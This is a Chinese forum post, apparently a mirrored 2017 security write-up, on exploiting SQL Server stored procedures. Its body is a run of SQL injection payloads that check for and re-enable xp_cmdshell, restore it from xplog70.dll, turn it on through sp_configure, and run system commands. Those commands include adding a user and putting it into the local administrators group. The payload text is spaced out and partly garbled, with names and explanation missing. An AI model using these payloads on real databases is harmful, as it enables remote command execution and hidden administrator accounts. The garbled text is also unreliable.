搜索

[20778] 2017-06-11_利用存储过程漏洞

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2017-06-11_利用存储过程漏洞   l e m o n   L e m o n S e c   2 0 1 7 - 0 6 - 1 1 x p _ c m d s h e l l x p _ r e g r e a d   -   x p _ r e g w r i t e - x p _ d i r t r e e x p _ e n u m d s n o d b c x p _ l o g i n c o n f i g a n d   1 = ( S e l e c t   c o u n t ( * )   f r o m   m a s t e r . . s y s o b j e c t s   w h e r e   x t y p e = ' X '   a n d   n a m e = ' ' ) - - x p _ c m d s h e l l x p _ c m d s h e l l a n d   1 = ( S e l e c t   c o u n t ( * )   f r o m   m a s t e r . . s y s o b j e c t s   w h e r e   x t y p e = ' X '   a n d   n a m e = ' x p _ c m d s h e l l ' ) - - x p _ c m d s h e l l ; e x e c   s p _ d r o p e x t e n d e d p r o c   ' x p _ c m d s h e l l ' - - x p _ c m d s h e l l ; E X E C   s p _ a d d e x t e n d e d p r o c   x p _ c m d s h e l l   , @ d l l n a m e   = ' x p l o g 7 0 . d l l '   - - ; E X E C   s p _ c o n f i g u r e   ' s h o w   a d v a n c e d   o p t i o n s ' ,   1 ; R E C O N F I G U R E ; E X E C   s p _ c o n f i g u r e   ' x p _ c m d s h e l l ' ,   1 ; R E C O N F I G U R E - -   / / 1 0 .   s p _ a d d e x t e n d e d p r o c   (   m s s q l s y s t e m r e s o u r c e     s y s )   E X E C U T E   x p l o g 7 0 . d l l   x p l o g 7 0 . d l l ; e x e c   s p _ a d d e x t e n d e d p r o c   x p _ c m d s h e l l , c : x p l o g 7 0 . d l l x p _ c m d s h e l l ; e x e c   m a s t e r . . x p _ c m d s h e l l   " "   - - ; e x e c   m a s t e r . . x p _ c m d s h e l l   " d i r   c : "   - -   / / C   ; e x e c   m a s t e r . . x p _ c m d s h e l l   " n e t   u s e r       / a d d   & & n e t   l o c a l g r o u p   a d m i n i s t r a t o r s     / a d d "   - -   / /
x p _ d i r t r e e

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理